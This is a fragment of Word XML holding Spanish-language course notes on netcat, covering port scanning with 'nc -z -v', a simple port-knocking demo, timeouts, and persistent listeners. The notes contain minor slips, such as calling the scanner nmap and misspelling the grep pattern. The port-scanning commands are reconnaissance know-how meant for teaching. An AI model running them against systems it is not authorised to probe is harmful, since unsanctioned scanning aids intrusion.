            <wp:effectExtent l="19050" t="19050" r="1968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263"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4419234" cy="711023"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="9BBB5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048542" w14:textId="5F8C6405" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="00445761">
      <w:r>
        <w:t>Efectivamente, si lo tiene a si que la transferencia ha sido correcta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE13F7" w14:textId="62DFFD3A" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F"/>
    <w:p w14:paraId="460282BF" w14:textId="695EA9B5" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F"/>
    <w:p w14:paraId="6FA17A2A" w14:textId="20D88F4D" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F"/>
    <w:p w14:paraId="2EFE4222" w14:textId="6B3BDEED" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F"/>
    <w:p w14:paraId="72E41C5C" w14:textId="3420F5C6" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F"/>
    <w:p w14:paraId="6F818C9C" w14:textId="57FC3B26" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F"/>
    <w:p w14:paraId="02761207" w14:textId="069E3544" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F"/>
    <w:p w14:paraId="7E6E374F" w14:textId="654CDF14" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F"/>
    <w:p w14:paraId="5116E9E4" w14:textId="689351D1" w:rsidR="00445761" w:rsidRDefault="00445761" w:rsidP="009E303F"/>
    <w:p w14:paraId="76B6BF46" w14:textId="5BD4E666" w:rsidR="005B5B0E" w:rsidRDefault="005B5B0E" w:rsidP="009E303F"/>
    <w:p w14:paraId="1197CE92" w14:textId="07DC5FA7" w:rsidR="005B5B0E" w:rsidRDefault="005B5B0E" w:rsidP="009E303F"/>
    <w:p w14:paraId="2C4E4E61" w14:textId="1CF9F7B3" w:rsidR="005B5B0E" w:rsidRDefault="005B5B0E" w:rsidP="005B5B0E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Escaneo_de_puertos"/>
      <w:bookmarkStart w:id="16" w:name="_Toc182474732"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Escaneo de puertos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="3CA05343" w14:textId="65E01469" w:rsidR="005B5B0E" w:rsidRDefault="005B5B0E" w:rsidP="009E303F">
      <w:r>
        <w:t xml:space="preserve">Podemos usar también nmap para escanear </w:t>
      </w:r>
      <w:r w:rsidR="008B58DE">
        <w:t>puertos</w:t>
      </w:r>
      <w:r>
        <w:t>. Para eso necesitaremos los parámetros “-z” y el “-v”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF05E3A" w14:textId="00CC7161" w:rsidR="005B5B0E" w:rsidRPr="005B5B0E" w:rsidRDefault="005B5B0E" w:rsidP="009E303F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B5B0E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>El -z sirve para buscar puertos abiertos sin enviar ningún dato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2658B3" w14:textId="7CBFF8BE" w:rsidR="005B5B0E" w:rsidRDefault="005B5B0E" w:rsidP="009E303F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B5B0E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">El -v sirve para que dé información más detallada. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB693C5" w14:textId="77777777" w:rsidR="005B5B0E" w:rsidRPr="005B5B0E" w:rsidRDefault="005B5B0E" w:rsidP="009E303F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722641F7" w14:textId="44C8D3EE" w:rsidR="005B5B0E" w:rsidRDefault="005B5B0E" w:rsidP="009E303F">
      <w:r>
        <w:t>El comando que debemos usar es “nc -z -v ip_a_escanear puerto”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677736FD" w14:textId="45E70050" w:rsidR="005B5B0E" w:rsidRDefault="005B5B0E" w:rsidP="005B5B0E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005B5B0E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A03CB70" wp14:editId="29AB82A5">
            <wp:extent cx="5048955" cy="447737"/>
            <wp:effectExtent l="19050" t="19050" r="1841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8955" cy="447737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent3">
                          <a:lumMod val="40000"/>
                          <a:lumOff val="60000"/>
                        </a:schemeClr>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4502C7" w14:textId="6B8863F5" w:rsidR="005B5B0E" w:rsidRDefault="005B5B0E" w:rsidP="009E303F"/>
    <w:p w14:paraId="1F2AA6B6" w14:textId="77777777" w:rsidR="00B3661B" w:rsidRDefault="005B5B0E" w:rsidP="00B3661B">
      <w:r>
        <w:t>También podemos escanear rangos de puertos</w:t>
      </w:r>
      <w:r w:rsidR="00B3661B">
        <w:t xml:space="preserve"> usando “nc -z -v ip_a_escanear primer_puerto:ultimo_puerto</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AE9BA4" w14:textId="0F1A4A54" w:rsidR="00B3661B" w:rsidRDefault="00B3661B" w:rsidP="00B3661B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3661B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DCC1EA5" wp14:editId="628D4A5B">
            <wp:extent cx="3314700" cy="3611956"/>
            <wp:effectExtent l="19050" t="19050" r="1905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9921" cy="3628542"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFF00"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF14076" w14:textId="77777777" w:rsidR="00B3661B" w:rsidRDefault="00B3661B" w:rsidP="00B3661B"/>
    <w:p w14:paraId="5D20A384" w14:textId="270D7CDD" w:rsidR="005B5B0E" w:rsidRDefault="005B5B0E" w:rsidP="009E303F">
      <w:r>
        <w:t xml:space="preserve">Si queremos hacerlo en un formato más agradable, podemos usar el </w:t>
      </w:r>
      <w:r w:rsidR="009822F9">
        <w:t>comando “grep”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para que solo nos salgan los que están abiertos</w:t>
      </w:r>
      <w:r w:rsidR="009822F9">
        <w:t>. Para eso, pondremos lo siguiente “nc -z -v ip_a_escanear 2&gt;&amp;1| grep “suceeded”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7BEA33" w14:textId="4FC85A94" w:rsidR="009822F9" w:rsidRPr="009822F9" w:rsidRDefault="009822F9" w:rsidP="009E303F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009822F9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>El 2&gt;&amp;1 sirve es para que funcione el grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C3304" w14:textId="4D707949" w:rsidR="005B5B0E" w:rsidRDefault="00844DC3" w:rsidP="009E303F">
      <w:r w:rsidRPr="00844DC3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EE9B384" wp14:editId="53E0D5E9">
            <wp:extent cx="6188710" cy="548640"/>
            <wp:effectExtent l="19050" t="19050" r="2159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548640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent4"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC276D6" w14:textId="2B55CF0D" w:rsidR="009822F9" w:rsidRDefault="009822F9" w:rsidP="009E303F"/>
    <w:p w14:paraId="15F5015D" w14:textId="734205E1" w:rsidR="009822F9" w:rsidRDefault="009822F9" w:rsidP="009E303F"/>
    <w:p w14:paraId="46E87250" w14:textId="5E763E5A" w:rsidR="009822F9" w:rsidRDefault="009822F9" w:rsidP="009E303F"/>
    <w:p w14:paraId="7942F3FC" w14:textId="1896FCF7" w:rsidR="009822F9" w:rsidRDefault="009822F9" w:rsidP="009E303F"/>
    <w:p w14:paraId="7373514A" w14:textId="2A02819D" w:rsidR="009822F9" w:rsidRDefault="009822F9" w:rsidP="009E303F"/>
    <w:p w14:paraId="3924EA09" w14:textId="77777777" w:rsidR="009B5A12" w:rsidRDefault="009B5A12" w:rsidP="009B5A12">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Netcat_para_Port"/>
      <w:bookmarkStart w:id="18" w:name="_Toc182474733"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Netcat para Port Knocking</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="697DB96F" w14:textId="69227159" w:rsidR="009B5A12" w:rsidRDefault="009B5A12" w:rsidP="009E303F">
      <w:r>
        <w:t>El Port Knocking es una técnica usada que p</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5A12">
        <w:t>ermite abrir puertos a través de una serie predefinida de intentos de conexión a puertos que se encuentran cerrados.</w:t>
      </w:r>
      <w:r w:rsidR="008B58DE">
        <w:t xml:space="preserve"> Esto es muy usado para implementar mayor seguridad en nuestros sistemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6963542C" w14:textId="281400D8" w:rsidR="008B58DE" w:rsidRDefault="008B58DE" w:rsidP="009E303F">
      <w:r>
        <w:t>Se suele usar mucho el Port Knocking en el protocolo SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22712594" w14:textId="77777777" w:rsidR="008B58DE" w:rsidRDefault="008B58DE" w:rsidP="009E303F"/>
    <w:p w14:paraId="29FABCF0" w14:textId="6B7B050D" w:rsidR="009B5A12" w:rsidRDefault="009B5A12" w:rsidP="009E303F">
      <w:r>
        <w:t>Para hacer esto con netcat vamos a hacer lo siguiente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D2D82" w14:textId="2BCFF988" w:rsidR="009B5A12" w:rsidRDefault="009B5A12" w:rsidP="009E303F">
      <w:r>
        <w:t>En el servidor vamos a poner lo siguiente “nc -l -p 500 &amp;&amp; nc -l -p 400</w:t>
      </w:r>
      <w:r w:rsidR="00656ED8">
        <w:t xml:space="preserve"> &amp;&amp; “hola mundo””:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A4A3A8" w14:textId="26808210" w:rsidR="00656ED8" w:rsidRDefault="00656ED8" w:rsidP="00656ED8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00656ED8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C30F8A4" wp14:editId="4711769B">
            <wp:extent cx="6028661" cy="290013"/>
            <wp:effectExtent l="19050" t="19050" r="10795"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2545"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6150375" cy="295868"/>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p w14:paraId="2B0A735C" w14:textId="7E6D260A" w:rsidR="00656ED8" w:rsidRDefault="00656ED8" w:rsidP="00656ED8"/>
    <w:p w14:paraId="3C594478" w14:textId="6571D219" w:rsidR="00656ED8" w:rsidRDefault="00656ED8" w:rsidP="00656ED8">
      <w:r>
        <w:t>Ahora si en el cliente intentamos entrar al puerto 500 y luego al puerto 400 del servidor, en la pantalla del servidor aparece “”hola mundo””.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A95F01B" w14:textId="59909C20" w:rsidR="00656ED8" w:rsidRDefault="00656ED8" w:rsidP="00656ED8">
      <w:r>
        <w:t>Iremos al cliente y intentaremos entrar al puerto 500 y luego al 400 del servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75437D1E" w14:textId="1BC25391" w:rsidR="009822F9" w:rsidRDefault="00656ED8" w:rsidP="00656ED8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00656ED8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1621C19D" wp14:editId="280D60BB">
            <wp:extent cx="5553850" cy="31436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314369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="460B909A" w14:textId="403498FA" w:rsidR="00656ED8" w:rsidRDefault="00656ED8" w:rsidP="00656ED8"/>
    <w:p w14:paraId="3CDD82BE" w14:textId="577E33AE" w:rsidR="00656ED8" w:rsidRDefault="008B58DE" w:rsidP="00656ED8">
      <w:r w:rsidRPr="00656ED8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="526DFC00" wp14:editId="181C7DB7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-271470</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>293444</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6816879" cy="370711"/>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16879" cy="370711"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00656ED8">
        <w:t>Luego si vamos al servidor, automáticamente habrá puesto la orden “hola mundo”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119AE22B" w14:textId="5CF113FC" w:rsidR="00656ED8" w:rsidRDefault="00656ED8" w:rsidP="00656ED8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2360C6A5" w14:textId="6D2FA29C" w:rsidR="00656ED8" w:rsidRDefault="00656ED8" w:rsidP="00656ED8"/>
    <w:p w14:paraId="5479AD3C" w14:textId="1F91818A" w:rsidR="008B58DE" w:rsidRDefault="008B58DE" w:rsidP="00656ED8"/>
    <w:p w14:paraId="2C23511E" w14:textId="1D04C88A" w:rsidR="008B58DE" w:rsidRDefault="0052240F" w:rsidP="00656ED8">
      <w:r>
        <w:t>Como vemo</w:t>
      </w:r>
      <w:r w:rsidR="009B095E">
        <w:t>s en el servidor se escribe automáticamente hola mundo. Pero como no es un comando, pone “orden no encontrada”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA0952" w14:textId="36344BB5" w:rsidR="008B58DE" w:rsidRDefault="008B58DE" w:rsidP="00656ED8"/>
    <w:p w14:paraId="0F492C15" w14:textId="029632FA" w:rsidR="008B58DE" w:rsidRDefault="008B58DE" w:rsidP="00656ED8"/>
    <w:p w14:paraId="572E5126" w14:textId="03E4ADF3" w:rsidR="00493D3A" w:rsidRPr="00493D3A" w:rsidRDefault="00493D3A" w:rsidP="00493D3A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Usar_“timeouts”_en"/>
      <w:bookmarkStart w:id="20" w:name="_Toc182474734"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidRPr="00493D3A">
        <w:t>Usar “timeouts” en netcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="4D5941FF" w14:textId="77D2A8DE" w:rsidR="00F72E06" w:rsidRDefault="00493D3A" w:rsidP="00656ED8">
      <w:r>
        <w:t xml:space="preserve">Para usar timeouts en netcat es </w:t>
      </w:r>
      <w:r w:rsidR="00F72E06">
        <w:t xml:space="preserve">fácil. Solo hay que usar el parámetro “-w” e indicar el tiempo en segundos. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A54103" w14:textId="163353DC" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00656ED8">
      <w:r>
        <w:t>Para hacerlo, en el servidor hay que abrir la conexión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A24DDF0" w14:textId="48116EFA" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00F72E06">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F72E06">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FDB4DDA" wp14:editId="1F18CD49">
            <wp:extent cx="4352925" cy="308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2780" cy="327205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0969115A" w14:textId="1588393F" w:rsidR="008B58DE" w:rsidRDefault="008B58DE" w:rsidP="00656ED8"/>
    <w:p w14:paraId="2608E38E" w14:textId="5DF58B76" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00656ED8">
      <w:r>
        <w:t>Ahora en la maquina cliente pondremos lo siguiente “nc ip_a_conectarse puerto -w 20”_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B409A" w14:textId="51780124" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00656ED8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72E06">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>el “-w 20”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72E06">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, en 20 segundos nos desconectaremos del servidor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D09F4B" w14:textId="414A9B59" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00F72E06">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F72E06">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6137A669" wp14:editId="74216C74">
            <wp:extent cx="4505323" cy="287065"/>
            <wp:effectExtent l="19050" t="19050" r="10160" b="177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7400" cy="293569"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent3"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66366CE3" w14:textId="4A2F8F96" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00F72E06"/>
    <w:p w14:paraId="1DA43B92" w14:textId="467C8714" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00F72E06">
      <w:r>
        <w:t>Pasado los 20 segundos, automáticamente el cliente cerrará la conexión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154974B5" w14:textId="5F6A2837" w:rsidR="008B58DE" w:rsidRDefault="00F72E06" w:rsidP="00F72E06">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F72E06">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EE23BE0" wp14:editId="6E6D1F14">
            <wp:extent cx="5419728" cy="457200"/>
            <wp:effectExtent l="19050" t="19050" r="952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412"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5420481" cy="457264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="F7964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C81680" w14:textId="37B32461" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00656ED8">
      <w:r>
        <w:t>Como vemos, funcionan también los timeouts en netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FADDE6A" w14:textId="0695C151" w:rsidR="008B58DE" w:rsidRDefault="008B58DE" w:rsidP="00656ED8"/>
    <w:p w14:paraId="3A25F327" w14:textId="5CEDF7E2" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00656ED8"/>
    <w:p w14:paraId="304B7557" w14:textId="48579DB0" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00F72E06">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Impedir_que_el"/>
      <w:bookmarkStart w:id="22" w:name="_Toc182474735"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Impedir que el servidor termine cuando el cliente se cierra</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="6449342A" w14:textId="3C1EA357" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00F72E06">
      <w:r>
        <w:t>Para impedir que el servidor termine cuando el cliente se desconecta hay que usar el parametro “-k”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D0BD4" w14:textId="7B6843BB" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00F72E06">
      <w:r>
        <w:t>En el servidor vamos a poner lo siguiente “nc -k -l 1234”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB62C1" w14:textId="04814C76" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00F72E06">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72E06">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Como hemos dicho antes, el “-k” sirve para que no se termine el servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cuando cierra el cliente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5EFF17" w14:textId="3E463F66" w:rsidR="00F72E06" w:rsidRPr="00F72E06" w:rsidRDefault="00D904B7" w:rsidP="00D904B7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D904B7">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27FB07B2" wp14:editId="5E968831">
            <wp:extent cx="5257798" cy="273369"/>
            <wp:effectExtent l="19050" t="19050" r="1968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2556" cy="279856"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="00B0F0"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="674E8CD0" w14:textId="4FF39CC9" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00F72E06"/>
    <w:p w14:paraId="4FD2B4D1" w14:textId="7406CA11" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00F72E06">
      <w:r>
        <w:t>Luego en el cliente nos conectaremos al servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4382DE58" w14:textId="40BABCD8" w:rsidR="00D904B7" w:rsidRPr="00F72E06" w:rsidRDefault="00D904B7" w:rsidP="00D904B7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D904B7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56EB8581" wp14:editId="6C0E7F17">
            <wp:extent cx="4457692" cy="284156"/>
            <wp:effectExtent l="19050" t="19050" r="19685"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5100" cy="289090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFF00"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3489F599" w14:textId="2B9FC8CC" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00656ED8"/>
    <w:p w14:paraId="5876BFA3" w14:textId="07D34099" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00656ED8">
      <w:r>
        <w:t>Para confirmar que no se cierra el servidor, pondré un texto en el cliente y cerraré la conexión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E61D8AA" w14:textId="1F8E9706" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D904B7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36106D81" wp14:editId="408A954E">
            <wp:extent cx="4229097" cy="820005"/>
            <wp:effectExtent l="19050" t="19050" r="19685"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6413" cy="825301"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent3"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
